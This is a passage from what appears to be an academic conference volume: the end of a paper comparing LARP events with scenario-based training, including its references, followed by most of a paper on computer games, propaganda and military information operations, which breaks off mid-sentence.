participant-participant interaction and those scenarios that were scripted by the organisers
(Lajvföreningen Solnedgång 2010a, Lajvföreningen Solnedgång 2010b, Utbult, et al., 2010, Karlsson
2010).
Prior to the start of Skymningsland, participants were briefed on safety, rules and guidelines along with
acting techniques. This occurred through written documents and a general brief on site. Additionally,
participants were provided with a compulsory workshop on acting, stunts and safety. During the event
itself, participants were free to act and respond as they wished within the constraints of the scenario, their
own role design and the rules and guidelines prescribed for the event. Experienced organisers and
functionaries were strategically and discretely dispersed throughout the event location to monitor and
manage it, provide quick response and ensure safety. This strategy allowed organisers to address
incidents and emergencies with minimal disruption (Lajvföreningen Solnedgång 2010a; Karlsson 2010,
Utbult et al. 2010). The event was followed by a significant debrief and assessment period. It commenced
with a short, formal debrief, followed by several hours of socialising where participants could share and
discuss their experiences. Following the event, participants were encouraged to share footage and
provide feedback on the event in the online forum. Online character data could still be edited and thus,
could be updated with the character's story as it had evolved during the event (Utbult et al. 2010,
Karlsson 2010).
The feedback, photos and filmed material was retained by the organisation. A report on the
Skymningsland event was also presented for the Snakkeklubben LARP discussion club (Karlsson, 2010).
All this material contributed to the expansion of the knowledge bank that Lajvföreningen Solnedgång has
been building since its first event. This knowledge bank feeds into the planning and preparation stage of
the organisation's next event as the data is used to develop and improve future productions.
(Lajvföreningen Solnedgång, 2010a; Utbult, et al., 2010). The survey results indicated that the majority of
respondents learned from participating at the event and that there was a higher likelihood of learning from
team situations than individual situations. 52% felt their ability to manage a crisis had improved, 77% felt
better prepared to deal with real-life situations resembling what they experienced in the event and 63%
had learned a new skill. Virtually all (97%) respondents had fun while participating.
Figure 5 Components of the methodology used by the organisers of the Skymningsland LARP event,
adapted from Utbult, et al. 2010a and Utbult et al. 2010b, Karlsson 2010 and Lajvföreningen
Solnedgång, (2010a-d)
137

Sara Hjalmarsson
The methodology used by Lajvföreningen Solnedgång is illustrated in figure 5. When compared with the
components and processes of the scenario-based training cycles (Burns et al. 1998, Burke & Salas, 2002
and Vincenzi 2008), they demonstrate a number of similarities. These are illustrated in table 1 and table
2.
Table 1: Comparison of processes from scenario-based training and the Skymningsland event
Processes Scenario-based training Skymningsland
Preparation
and planning
Audience, task, learning objectives,
competencies
Execution Event scenario, performance
measurement, data collection,
performance diagnosis
Assessment Feedback and AAR, archive performance
data, skills inventory
Desired audience, organiser objectives, participant
objectives, scenario and event, marketing
Scripted scenarios, unscripted and participant-created
scenarios, monitoring and management. No formal
data collection or performance diagnostic.
Formal and informal debrief and feedback, archive
event and event evaluation data
Table 2: Comparison of components from scenario-based training and the Skymningsland event
Scenario-based training Skymningsland
Skill inventory and performance data Knowledge bank and feedback from previous events. Character
development records (where applicable).
Tasks and KSAs Expectations and requirements. Limited knowledge of KSAs.
Training objectives Event objectives and participant objectives
Exercises, events, curriculum, scenarios,
scripts
Organisers plan workshops, scripted scenarios and dramaturgy.
They also assess non-scripted plot development, coach
participants and design the event.
Participans self-study, design costumes, props and characters.
They also plan scenarios with other participants.
Performance measures and standards Personal goals for participants. Community and informal standards
for event.
Feedback and debrief Short formal debrief. Extensive informal debrief. Feedback via
forum, socialising, website and events.
Similarities were found primarily in terms of the processes and components involved in designing,
executing and concluding the scenario. Differences could be observed in details relating to the different
needs and objectives of scenario-based training for education and LARP for entertainment. Both
evaluated the needs of their audience and required competencies, but the scenario objectives were very
different. The objective of Skymningsland was to be a satisfying event, so objectives depended on market
research, rather than educational theory. Both disciplines offered scripted events, but Skymningsland
placed significant focus on unscripted activity. In addition, it lacked performance measures, in contrast to
scenario-based training.
Feedback and debrief constitute an important step in both scenario-based training and the
Skymningsland event. Where this stage is formal in scenario-based training, at Skymningsland, it was
informal, consisting of discussion and socialising between individual participants. The formal feedback
focused on the organisers of the event and was conducted by the participants using web-based tools.
The processes and tools used for the Skymningsland events could be adapted for use in simulations and
exercises related directly to information warfare. Live events could be used to prepare for situations
involving social engineering, swarming and physical aspects of information security. Additionally, they
could be complemented with virtual activities, such as simulation of a cyber attack. The online tools used
to develop characters, fictitious relationships and mini-scenarios could be developed into a tuition and
feedback tool. The organisers could be employed for scenario-generation and the participants could be
employed as interactive role-players.
5. The need for further research
Research on LARP and Edu-LARP is currently being conducted by academia and private initiatives. One
such private initiative is the International Comparative LARP Study (Kann, 2010a and Kann, 2010b),
138

Sara Hjalmarsson
which aims to survey LARP communities in different countries. This and other research is critical for
determining how LARP and Edu-LARP can be used in scenario-based training for security, crisis
preparedness, information warfare, authentic tasking, critical infrastructure and emergency services.
Future studies should consider a wider range of LARP cultures, models and styles to determine whether
these are variables with an impact on effectiveness. Such a study must also take into consideration
pervasive LARP models. Research into these and other variables would also aid in determining the
scope within which LARP could prove a useful tool and where it is not appropriate to implement it.
Literature such as Bowman 2010 and Ungdomsstyrelsen 1997 (translated by Larsson, n.d.) and
interviews (Lunau 2010 and Hyltoft 2010) indicate that LARP participation aids in identity creation.
Speculatively, this may reduce an individual's vulnerability to factors leading to radicalisation, such as
identification with extremist groups. Thus, it may offer an avenue for the prevention of terrorism and
crime. Although such a topic lies outside the scope of this particular paper, future research could explore
this area further.
Future research could also explore further, the various ways in which experienced LARP participants or
organisers could be integrated into pre-existing or new scenario-based training programs. Such a study
may explore how the same participants and organisers may be trained or educated in order to adapt their
skills to a professional training environment. Such a study could contribute to a reduction of
unemployment, both by creating opportunities for the LARPers themselves and for the individuals they
train. It may also be relevant for research to design and test Edu-LARP activities tailored for the
emergency services, security or even a crisis management team. For such an event to be appropriately
designed, it will be necessary to find individuals with appropriate experience and determine key success
factors.
6. Conclusion
The implementation and research of Edu-LARP within traditional and adult education and the indications
of survey respondents demonstrates that LARP and Edu-LARP holds educational value. This holds true,
even when LARP events are tailored toward entertainment, as opposed to learning. Whereas a hybrid
model could be tailored to distinct needs, it may also be possible for individuals to attend an appropriate
LARP and self-manage their learning process.
This paper highlights the fact that LARP and Edu-LARP can offer several useful tools for scenario-based
training and simulation. Nevertheless, further research is needed in order to determine how LARP can be
most effectively utilised, ascertain determinants of success and identify a means to evaluate the
appropriateness of non-educational LARP for training purposes. Developing and testing different LARP
models for training purposes is yet another topic for future research. Additionally, future research may
ascertain how organisers and participants can have their skills made more relevant to scenario-based
training for critical infrastructure, emergency services and crisis preparedness. Furthermore, the role of
LARP in identity formation could be researched to determine its value in counter-radicalisation.
References
Bioterrorism week, 2007. Mecklemburg EMS introduces most-advanced situational training in America for emergency
medical personnel. Bioterrorism week, October 1, 2007,page 11. [electronic journal]. Available from
[Accessed April 15th, 2010]
Blanchard, P. N., Thacker, J. W. (2010) Effective Training: Systems, strategies and practices. Pearson Education,
New Jersey.
Bowman, S. L. (2010) The function of role-playing games: How participants create community, solve problems and
explore identity. McFarland Press, NC.
Burke, C.S., Salas, E., 2002. Simulation for training is effective when. Quality and safety in healthcare, 11(2), pp.119-
120. Available at [Accessed June 4, 2010]
Burns, J. J., Cannon-Bowers, J. A., Pruitt, J. S., Salas, E. (1998) Advanced technology in scenario-based training. In:
Making decisions under stress: Implications for individual and team training. pp. 365-374. Available from
[ Accessed June 4, 2010]
Bøckman, Petter. 2003. The Three Way Model — Revision of the Threefold Model. In Gade, Morten, Thorup, Line, &
Sander, Mikkel (eds), As Larp Grows Up — Theory and Methods, pp. 12-17. [E-book]. Available from
http://www.darkshire.net/ jhkim/rpg/theory/threefold/faq_larp.html [Accessed April 16th, 2010]
Cohn, J. C., Lyons, D.M., Schmorrow, D. (2002) “Scenario-based training with virtual technologies and
environments”. Proceedings of the Image 2002 conference, Arizona, US.
Edwards, R. (2001). GNS and Other Matters of Role-playing Theory [online]. Available from http://www.indierpgs.com/
articles/1 [ Accessed December 27, 2010]
139

Sara Hjalmarsson
ELIN (2010). “Welcome to ELIN”, [online] Available from http://www.edularp.org/index.php?option=com_content&view=frontpage&Itemid=7
[Accessed on April 23, 2010]
Föreningen Knutpunkt, Betahaus (n.d.) “What is Knudepunkt?”, [online] Available from http://www.knudepunkt.org/
[Accessed December 14, 2010]
Honoré, G.R.L., Zajac, D.L., 2005. Theater immersion: First army post-mobilisation training. Armor. May/June 2005,
page 12. [electronic journal]. Available from . [Accessed April 14, 2010]
Hyltoft, M. 2010.Interviewed by Hjalmarsson, S. [video interview]. Osted Fri- og Efterskole, Osted, Denmark. August
18, 2010.
Hyltoft, M. (2008) The role-player's school: Østerskov Efterskole. In Montola, M., Stenros, J. (editors) (2008)
Playground worlds: Creating and evaluating experiences of Role-playing games, pp.12-25. [E-book]. Available
from http://www.solmukohta.org/pub/Playground_Worlds_2008.pdf [Accessed April 16th, 2010]
Interacting Arts (2010) “New Anthology on Nordic live Role-Playing: Playing reality”, [online] Available from
http://interactingarts.org/blogs/index.php?title=title_6&more=1&c=1&tb=1&pb=1 [Accessed April 22, 2010]
Kann, T. (n.d.) “International Comparative LARP Study” [online]. Accessed February 22, 2010 from http://www.larpresearch.net
Kann, T. (2011) “International Comparative LARP Study”. Presentation held at Knudepunkt 2011, Helsinge,
Denmark, February.
Karlsson, P. (2010) “Skymningsland”. Presentation held at Snakkeklubben, Stockholm, Sweden, September.
Kim, J. H. (2003a). “The Threefold Model FAQ”, [online], http://www.darkshire.net/jhkim/rpg/theory/
threefold/faq_v1.html. [Accessed January 6th 2011]
Kim, J. H. (2003b). “The Origin of the Threefold Model”, [online],
http://www.darkshire.net/jhkim/rpg/theory/threefold/origin.html [Accessed January 6th 2011]
Kim, J. H. (2005). “The Evolution of the Threefold Model “, [online],
http://www.darkshire.net/jhkim/rpg/theory/threefold/evolution.html [Accessed January 6th 2011]
Lajvföreningen Solnedgång. (2010a) “Skymningsland”, [online], http://www.solnedgang.org/skymningsland
Lajvföreningen Solnedgång. (2010b). “Skymningsland for Dummies”, [online],
http://www.solnedgang.org/skymningsland/?page=48
Lajvföreningen Solnedgång. (2010c) “Lite data” [online], Available at http://www.solnedgang.org/skymningsland
Larsson, E. (n.d) Role-playing as leisure activity: Report from The Swedish National board for Youth Affairs
[translation]. Available from
http://www.dragonbane.org/attachment/f20c14076824322fa2a4f3c2d7b6c3fc/7608fbb646610f702d18a51bc944
c760/role-playing.pdf [Accessed August 30, 2010]
Lunau, M. 2010. Interviewed by Hjalmarsson, S. [video interview]. Østerskov Efterskole, Hobro, Denmark. August 17,
2010
Moats, J.B., Chermack, T.J., Dooley, L.M., 2008. Using Scenarios to develop crisis managers: Applications of
scenario planning and scenario-based training. Advances in developing human resources, 10(3), pp. 397-424.
[electronic journal]. Available from http://adh.sagepub.com/cgi/content/abstract/10/3/397 [Accessed April 14th,
2010]
Montola, M., Stenros, J. (editors) (2008) Playground worlds: Creating and evaluating experiences of Role-playing
games. [electronic edition]. Accessed April 16th, 2010 from
http://www.solmukohta.org/pub/Playground_Worlds_2008.pdf
Montola, M., Stenros, J. (2010) Nordic LARP. Fëa Livia, Stockholm.
Mäkelä, E., Koistinen, Siukola, Turunen (2005) “The process model of Role-Playing”. In Bøckmann, P., Hutchison, R.
(editors) (2005) Dissecting LARP [E-book], pp. 205-236. Available from
http://knutepunkt.laiv.org/kp05/dissectionlarp.pdf [Accessed April 26th, 2010]
Oser, R. L. (1999) “Enhancing human performance in technology-rich environments: Guidelines for scenario-based
training”. In Salas, E. Human/technology interaction in complex systems. Vol 9, pp. 175-202. Stamford: JAI
press.
Postapoka, 2010. Skymningsland – Bilincidenten. [video online], Available at
http://www.youtube.com/watch?v=KfUXnjYIBZ8 [Accessed October 18, 2010]
Steadman, R., Coates, W. C., Huang, Y. M., Matevosian, R., Larmon, B. R., McCullough, L., Ariel, D. (2006).
"Simulation-based training is superior to problem-based learning for the acquisition of critical assessment and
management skills". Critical care medicine, 34 (1), p. 151. Available from
http://journals.lww.com/ccmjournal/Abstract/2006/01000/Simulation_based_training_is_superior_to.21.aspx
[Accesed June 4, 2010]
Supernaut242, 2010. Skymningsland @ Snakkeklubben Stockholm [video online]. Available at
http://www.youtube.com/watch?v=b8SmixHWoF0 [Accessed November 2, 2010]
Ungdomsstyrelsen, 1997 Rollspel som fritidssysselsättning. Available from
http://www.dragonbane.org/attachment/f20c14076824322fa2a4f3c2d7b6c3fc/0a2267918c7179c75df094e8550f
37e9/rollspelsomfritidsysselsattning.pdf [Accessed August 30, 2010]
Utbult, S., Axner, J., Sortti, A., Wallgren, S., 2010. [chat, personal messages and E-mail] (Personal communications
2 February 2010 – September 5, 2010).
Vincenzi, D. A., Wise, J. A. (2008) Human factors in simulation and training. USA: CRC Press.
Whitcomb, C. (1999). Scenario-based training at the FBI. American Society for Training & Development, June 1999,
p. 42. [electronic journal]. Available at Accessed April 14th,
2010
140

Computer Games as the Representation of Military
Information Operations – A Philosophical Description of
Cyborgizing of Propaganda Warfare
Aki-Mauri Huhtinen
Finnish National Defence University, Finland
aki.huhtinen@mil.fi
Abstract: The history of combat is primarily the history of radically changing fields of perception. In other words, war
consists not so much of scoring territorial, economic or other material victories but of appropriating the immateriality
of perceptual field. The function of the eye has become the function of the weapons (Virilio 1989; 2009). To
understand information age warfare we have to understand the concept of representation as a part of our process of
violence. The idea of information warfare or an information operation is based on the process where the physical
target is no longer destroyed with the kinetic systems, but the process where the non-kinetic systems, like
information, scan the symbols-semiotics networks. Today, particularly the advanced mobile technology, the Internet
and the entertainment industry immensely exploit the experiences from different wars and conflicts for example as
ideas of computer games. In return the military industrial complex represents its own language for example in the
concept of information operations with the help of applications particularly rising from the entertainment industry. The
roles of Hector and Achilles, the teachings of Jomini and Clausewitz have an effect in the background of games and
gaming. Opposite to Clauseiwitz’s thinking, Jomini took the view that the amount of force deployed should be kept to
the minimum in order to lower casualties and that war was a science, not an art. The most central genres in gaming
are ”strategy”, ”adventure”, ”shooter”, ”sports”, ”simulation”, ”music”, ”role playing” and ”puzzle”. All of these are
related to warfare one way or another. Another interesting fact is that in the 1950’s the first computer games were
mathematic strategy based games that that had been developed in universities (Czosseck 2009; Peltoniemi 2009).
Keywords: computer games, decision making, information operations, propaganda, representation
1. Introduction
According to Sun Tzu the acme of the Art of War is a victory without fighting. Chess can be considered as
a game connected to the art or war, which follows a clear rational pattern, but the endless number of
options makes it chaotic, creative, sudden and even tragic. In his classic piece the Iliad Homer describes,
through the warriors Hector and Achilles, the two central roles of warfare: warfare controlled by duty and
warfare controlled by emotion. This duality can be seen throughout the history of the western art of war,
sometimes emphasizing the rational and normative nature of warfare (Hector) and sometimes the
intuitive, subconscious and emotional nature of warfare (Achilles). As the science of a new age advanced
Jomini developed geometric and mathematical models for warfare, whereas Clausewitz saw that war
cannot be controlled rationally and it is always affected by chance or friction. Today, we can find this
evolution of warfare, for example, in computer games (Bosquet 2009; Taylor 2003).
War themed computer games also have the characteristics of real warfare planning (Allen 2010; Virilio
2009; Zizek 2010). In the games you can fight almost in a way that feels physically real, advancing blockby-
block and by firing at targets, enemies or objects, you can change weapons and ammunition
according to the power you need. On the other hand, in the games you can also plan and simulate
operations as in real military staffs. In the games you can lead and give tasks, switch operating
environments and conditions. This is also done in real military operations ( Allen 2010; Boisot,
MacMillian, Kyeong 2007). The games also act as a recruiting channel as the young people have a
natural command of gaming and the world of play. Game simulators placed in shopping malls give a
realistic image of for example Afghanistan and under the guise of entertainment they get the young
people interested in the military as an employer. In addition, the movie industry is using crime and war
more and more as a frame of reference for the actual story (Peltoniemi 2009).
War shapes society and society shapes the suppositions related to war (Stahl 2010 and Shaw 2005).
War is rewriting its position as a part of western society, economy, politics and industry. The media,
advertising and the Internet enable real-time data transfer where the interfaces of different actors
(political, social, economic, military) blend into a one single information flow. The chance is born, that the
society becomes permeated with security so that its actions can no longer be intervened in. Also the
blending of weapons systems to become more and more like the regular IT systems, especially in the
sphere of information warfare, makes the definitions of warfare, weapon and soldier to be relative. Clear
norms related to violence drag behind the actual cases. A typical example of this is the information battle
141

Aki-Mauri Huhtinen
between Wikileaks and the Pentagon. The facts are missing and we depend on impressions (Ellul 1965;
Gray C.H. 2002).
In this article I try to describe the postmodern complex networks of different kinds of actors of making war
and security. The main argument is that all actors from a single poor young dropout to a high political
level state member are part of the complex ‘military-industrial-advertising systems’. The real combat for
example in Afghanistan is connected to the high-technology industry and advertising market. For
example, warfare of the information age is represented by computer games. There is also a possibility
that the news of war and conflict are not real anymore, but a complex level represented and framed to a
level that is familiar to our senses (Stahl 2010).
2. The propaganda of war - perception and its representation
Charles S. Peirce is one of the creators of the concept of semiotics and representation. According to his
theory, the moment before a person becomes conscious is preceded by a numerous series of
perceptions of which we are unaware. In other words, according to him, we are never temporally directly
simultaneously in contact with the object. The object is thus a hypothetical boundary, which can be
approached but never touched as such. This assumption is based on the idea of the continuity of time
(Bergman 2010, 80-81). Representation means two different kinds of phenomenon. The first one is to try
returning the phenomena into this moment. The second one is to stand for the absent phenomena. The
representation of the world is not real, because there is always something beyond the frame of
representation. The increasing amount of information we receive by sight makes it impossible for us to
filter all of it. This means that “the more you watch, the less you know” (Strazzanti 2009: 14).
Thus, we are always looking at the world through some frame or other. When a journalist reports the
news from Afghanistan or a producer of video games designs a war game, the attempt to say something
about the actual activities is always limited and subjective. The point of view of the media is also always
subjective. And even the best video game can do no more than provide a representation of actual
warfare. Today, the reasons for war are justified in the narrative struggle between different viewpoints.
The credibility of different stories is weighed through the media. With their opinions, people vote on
whose story is the most credible. We can no longer speak of the truth. In relation to war there is no such
thing, since the producer or author of a documentary or a piece of news is connected through different
networks to the makers of war themselves. The salaries of those who photograph war are paid through
war and its making. Correspondingly, video games need real soldiers who have experienced combat in
order for them to be developed in a more authentic direction (Krishnan 2009; Palojärvi 2009; Stahl 2010).
According to Ellul (1965) propaganda is a social phenomenon rather than something that is made by
certain people for certain purposes. Propaganda exists and thrives. Propaganda aims not only to change
people’s opinions, but tries to lead men into action. Ellul sees propaganda in two forms: agitation
propaganda and integration propaganda. Integration propaganda is an organic part of a technological
society. Modern propaganda cannot also work without knowledge of technological science. Not only is
propaganda itself a technique, it is also an indispensable condition for the development of technical
progress and the establishment of a technical civilization. The propagandist is anyone who
communicates his ideas with the intent of influencing his listener.
The so called “diffused audience” (Hoskins and O’Loughlin 2010,14) means that everyone becomes an
audience all the time and there are no possibilities to analyse beforehand who will be the target audience
in the specific case. The decision-making is done through automated surveillance of both online and
offline behaviour. These surveillance technologies “screen out” the normal but bring into focus the
unusual behaviour (ibid.,15). Diffused war has the name of a new paradigm of war in which the
mediatisation of war makes it possible to diffuse causal relations between action and effect more,
creating a greater uncertainty for policymakers in the conduct of war (Hoskins and O’Loughlin 2010, 3.).
Today both the sphere of policy and the sphere of business operate under the laws of marketing.
Politicians cannot gain support without political advertising promoting them and their policies as
trademarks. In the case of war, propaganda campaigns are crucial in order to gain public support.
(Strazzanti 2009.)
The link between classical propaganda as the specific technological tool and today’s concepts like
strategic communications is not so far fetched. Everything must also be utilized. A good propagandist
must use not only all of the instruments, but also different forms of propaganda. The ground must be
sociologically prepared before one can proceed to direct prompting. Propaganda tends to make the
142

Aki-Mauri Huhtinen
individual live in a separate world; he must not have outside points of reference. Nowadays, the Internet
is based on the same idea, but upside down: there is no possibility to exist without communication. There
are no lines between private and public life.
According to “NATO Military Concept for Strategic Communication” (15OCT2009), executing a Strategic
Communications process may require cultural or organisational change as it requires a network-centric
approach and speed of decision making that may be at odds with more traditional, hierarchical military
structures. It involves empowering the release of information at levels far below that of most current
structures and an acceptance of greater risk in that information released quickly may not always be
perfect and will require follow-up and refinement. It also requires the development of a strategic narrative
that will shape NATO’s actions and the manner in which those actions are communicated.
NATO policy defines NATO Strategic Communications as follows:
“The coordinated and appropriate use of NATO communications activities and capabilities –
Public Diplomacy, Public Affairs (PA), Military Public Affairs, Information Operations (Info
Ops) and Psychological Operations (PsyOps), as appropriate – in support of Alliance
policies, operations and activities, and in order to advance NATO’s aims”. (NATO Strategic
Communications Policy, 29 Sep 09).
However, from a military perspective, the Strategic Communications process not only seeks to coordinate
the work of the traditional communication functions of Public Diplomacy, PA, Info Ops and PsyOps, with
each other, but also with the critical operational non-kinetic and kinetic elements which often convey far
more meaning and have an immeasurably greater impact on people’s perceptions than words or imagery
alone ever could.
3. Information and decision making in three different worlds
In this chapter I describe the change in war through three different worlds as follows:
Table 1: The way of war in three different worlds
Rational world Complex world Postmodern world
Weapon(s) - machine gun -nuclear weapon - Internet
The nature of knowledge - rational knowledege - information flow - narrative stories
Society - agrarian society - industrial society - information society
The name of wars - World War I and II,
Holocaust
- Blitzkrieg 1939-1941,
Pearl Harbour 1941, WTC
2001
- civil wars, French
Revolution,
Communist Revolution,
Vietnam,
War Against Terror
Nothing is anything,
Slogans We have to decide We have to exploit every
channel to communicate everything is all
The model of competition - state versus state - technology versus - public actor versus
technology
private actor,
human versus robot
The structure of - linearity, bureaucracy, - complexity, system - mycelium, conflict
organization
rules
The key actors - muscels, brains - communications - consume
The key thinking model - first you plan, then you
execute
The authors Max Weber, Frederick
Taylor, “franchising”,
Clausewitz, Jomini
- planing and execution
parallel
Herbert Simon, James G.
March, Peter Drucker
“corporate covernance”,
“bounded rationality”,
John Boyd, John Warden
- planing = execution
Critical Management
Studies CMS,
“The Practice Turn”,
Michel Foucault,
Paul Virilio, Slavoj Zizek
The model of three possible worlds does not mean it is a list from best to worst or an evolutionary
process. The rational world is affecting our time just like the complex and the postmodern ones. For
143

Aki-Mauri Huhtinen
example, military traditions, traditions and routines are still formal by nature and even fanatically rational,
sometimes almost to a religious extent. After all, the rational paradigm strives to control and rule the
world by being meticulous and by eliminating errors. Asking too many questions is avoided and the
chosen avenues to act are made more effective by planning. In western countries public administration is
still a rational bureaucracy directed and prescribed by legal means. Meanwhile, networking and
information technology are permeating the future operations of organisations, through different innovation
models, security and safety oriented thinking and strategic leadership thinking models. The idea of
technology and systems thinking is that the world cannot be controlled from the outside by means of
rational planning, but the control is exercised through practices that are formed by interconnected
technology networks. At the same time with the rational and complex world, in the different flashpoints of
the world there is a very large asymmetry between the crisis management machine of the West, the local
inhabitants and the terrorists. The combination is conflicting in a post modern way. (e.g. Kilcullen 2009)
Information context has a much larger effect on our observation than facts do. A good example of this is a
classic decision making experiment. The person arranging the experiment is auctioning a 100 dollar bill to
a group of approximately 30 people. The biggest offer wins the bill, but the one with the second highest
bid has to pay the amount of their own bid without getting anything in return. At first there are plenty of
bids because everyone thinks that it is good to bid 20 or 30 dollars for a 100 dollar bill and drop out of the
bidding in time. When the bidding nears the 100 dollar bids, usually only two bidders remain and an
authority competition develops between them. When the bids pass 100 dollars, the two competitors may
continue high risk taking in order to avoid the dead end of the second best bid. The end result usually is
that a 100 bill will cost the winner 200 dollars (of course the end net loss is 100 dollars) and the one with
the second highest bid has to pay 195 dollars without getting anything in return.
This example demonstrates the social and contextual nature of our decision making. Usually people with
a high competition drive take enormous risks while trying to maximize the winnings, no matter what the
cost. In politics and warfare there are countless examples of this, that decision making is rarely a rational
event, but is rather based on social and emotional relationships, expectations of our roles and the mental
trap of risk taking ( Soeters, van Fenema, Beeres 2010; Taylor 2010; Zizek 2009 and 2006).
However, war cannot change its nature. War is still organised violence. The question is if the new wave
of warfare causes evolution or revolution. The change has happened in the character of wars and the
manner in which wars were conducted. Like the first and second Iraq wars can show us, war is not about
eliminating targets and dominating the enemy’s military power. It is purposeful violence to achieve a
political goal. Warfare may be becoming revolutionized, not the military affairs (Shimko 2010; Friedman
2009; Lind 2010 ). Still, most of the current military thinking on information operations (Info Ops) and
strategic communications is based on the assumption that it is possible to take command and control
(C2) of the battle space (Taylor 2010, 13). Info Ops is not about what you say but what you do. In a
military organisation, its physical superiority and technological advantage work against it, because all
through western military history, the key issue for victory has been “de-escalation”. The state military
must seek in every possible way to de-escalate, to resolve the situation without violence or with a
minimum amount of violence (Lind 2010, 35). The key idea of the new model of the science of war will be
the so called “Joint Distributed Operations”.
4. Computer games as a way of communication in three different worlds
This chapter introduces the computer game exercise held for the cadets in the Bachelor’s degree
programme in the Finnish National Defence University in the autumn of 2009.
During the course Introduction to Leadership, in 2009, three computer games were introduced, each
representing their own genre. Modern games are increasingly combinations of different genres. During
the course the three games of different genres tried to demonstrate the development of interaction
between the game and the player.
The enormous technological development and the increased turnover mean the arcades and video game
programming companies have been able to grow and develop new genres and platforms. Usually games
are categorized based on their mechanics. This means that two games of the same genre may differ from
each other in terms of narratives and visual properties. Many games exploit several game mechanics; for
example 'party games', developed to be used by several people using the same console, and which
typically consist of a range of 'mini games' and genres. A game may also consist of one genre only. An
144

Aki-Mauri Huhtinen
example of this would be a 'fighting game', which focuses on the close combat between the characters
controlled by the gamer and the adversary controlled by the programme.
4.1 The games of the 'rational world'
The logic of the 'rational world’s' games is that the player or “cyber-soldier” actively controls the game,
which passively reacts to the player's actions. The decision making process is based on an idea of a
rational environment and communication relationships. This means that the player has to be precise and
acts to be both quick and accurate. Communication is not dialogue between game and player. When the
player makes mistakes, the game only becomes passive. The basic idea is that reality can be controlled
immediately and there is no difference between the representation processes.
One of the first games to be introduced was Super Mario Brothers, which is a limited-range game where
the character moves from a level to another. Typical for games of this type is that it presents the
character from a side-view, and that the game advances in different 'worlds' or on different levels, where
the character collects items, dodges objects, destroys enemies and solves different problems. In Mario
the object is very clear: to save princess Peach from the evil Koopa turtle. In order to do this, the player
has to pass several levels, at the end of which there are different opponents that test the player's skills
and nerves. On the last level the player confronts the king of the Koopa turtles, and after defeating him
the game is over. The player interacts with the game by controlling the motions and movements of the
character with the buttons of the controller, and by aiming to advance onto the next level. The game does
not allow the player to vary the game strategies, and the player has to 'pass' the game with a set trick and
advance within the limits set by the game. The game gives feedback by notifying the players of the value
of 'coins' collected during the game, and of the time left to complete the level. If the character fails to
complete the task, the player loses a 'life', which gives the player new chances to try and complete the
level.
Simple 'jump level' and adventure games are now mainly entertainment used on portable platforms while
travelling or a game type for players who want to compete against the computer. There is also
international competitiveness. For this game type, there are lists of high scoring gamers, which allow the
competition against someone with a better score. This is typical for mobile phone games, as the spread
of wireless networks allows the use of the Internet also while on the move.
4.2 The games of the 'complex world'
In the games of the 'complex world' the player adopts a position in the game and the game gives
feedback on the player's capability to understand the networks within the game. The player is the more
dominant part of the game. The decision making process is based on the idea of a complex systembased
environment and communication relationships. The basic idea of this level is that there are
different kinds of representations processes but we can still control over them.
As an example of this genre, the shooting game Half Life and Counter Life, which is designed especially
for online-gaming, can be introduced,. It is an FPS (First Person Shooter) game, where the player
controls a terrorist or a counter terrorist character, in first person, in a team based shooting game. The
duty of the counter terrorists is to prevent the activation of a bomb or dismantle it, rescue hostages or
protect VIPs. Respectively, the terrorists try to plant the bomb in its target, withhold the hostages, or stop
the VIPs from entering the secure area. The game is played for certain lapses of time, during which either
of the parties have to complete their mission. The goal of the team is to play a certain number of rounds,
and the team winning most rounds also wins the game. A team may win either by completing their
mission, or by eliminating the enemy team. A reward system is a crucial part of the game: victories, both
team and personal, are rewarded with 'money', which can be spent on better arms and equipment.
The big change compared to jumping levels and a restricted game environment is the interactive impact
of the players on each other. The game contains maps, which do not necessarily influence the player's
actions, but create the aims and 'frames' for the players. Factors impacting the gaming are the
cooperation between the team members and the impact caused by the enemy. Controlling the game is
made simple, but succeeding in the game requires practice and several hours of experience in eyemouse
coordination. This is why FPS games are referred to as skill games, and there are several
individual and team esports (electronics sports) tournaments both online and in LAN-happenings.
145

4.3 Games of the 'postmodern world'
Aki-Mauri Huhtinen
In the games of the 'postmodern world' the game and the players are equals and the player has no
authority over the course of the game. Communication is bidirectional. The games of the postmodern era
are an analogy for the transition into social media, which, in a sense, are a simulation of postmodern
computer games. The decision making process is based on the idea of a chaotic and non-rational
environment and communication relationships. The basic idea is that there are different kinds of
narratives and we have no one and only right representation process.
As the third game example we introduce an MMORPG (Massive Multiplayer Online Role-playing Game)
World of Warcraft. Computer games are traditionally understood as games where the player creates and
controls the character, the properties and skills it develops as the game advances. Role-playing games
may be either serious, plotted games where the focus is on problem solving or on the development of the
plot, or fast-paced combat games. In traditional table games, enacting the character is part of the game.
This is a feature most computer games lack, but depending on the players, they may empathise with their
characters. Especially in online role-games this option is available, and for example in World of Warcraft
the players are offered special RP (role playing) servers, where the rules of the server demand devotion
to the game character's role.
In World of Warcraft and in the genre it represents the player can utilise the features of traditional role
playing games in creating and developing their character. Playing on the Internet with other players
creates a social element in the game, where developing your own character and accomplishing missions
together with the others, managing your wealth and the battles between the players are important
aspects of the game. At the moment, World of Warcraft is the most successful online game of its genre,
with almost 11 million players worldwide. Especially successful features of the game are its realization of
the game 'world', the missions executed alone or as a team, and the development of the characters and
their battle. An example of a well realized social aspect includes large guild networks, through which it is
possible to organise guild cooperation, such as conquering caves and battling group against group. The
possibility to play either alone or as part of a group makes MMORPGs highly interactive. A single player
may witness a lot of content variation due to the other gamers' actions and due to the extensive game
'world'.
In modern MMORPG gaming culture also the financially substantial tournaments are essential. Usually
tournaments focus on a certain aspect of the games, e.g. combat. The developing ESports-leagues
advance competitive gaming and have created the subtype of professional gaming, especially in World of
Warcraft, where the players combat each other "to the last man".
5. Conclusions - eye as a function of weapons
In the western security understanding the function of the eye has become the function of weapons.
Western culture has moved from living a physical life to sitting behind the computer screen. When you
can see the target on your screen, you expect to influence or (in combat environment) destroy it. What is
perceived is already lost. We cannot live without acting and communicating. Unlike weapons which have
to be publicised if they are to have real deterrent effects, stealth equipment can only function if its
existence is clouded with uncertainty. This is the so called “aesthetics of disappearance” (Virilio 1989).
The history of the games industry is heavily concentrated on the USA and Japan. The United Kingdom,
South Korea and Canada are also very strong. In the USA 40% of gamers are female. There is an
argument that the easy access to guns in the USA has more of an effect on gun violence than shooting
games do (Peltoniemi 2009). A “rational-complex-mycelium chain” can be observed through the
development of game mechanics. The older games, in the 1970's and 1980's, were all rational; only one
correct solution and order in which to complete things. In the 1990's the free roaming or sandbox games
became popular where the player defines the goal and there are many ways to reach it. These can be
seen as complex games. A well known example of a game like this is Sim City from 1989. We can also
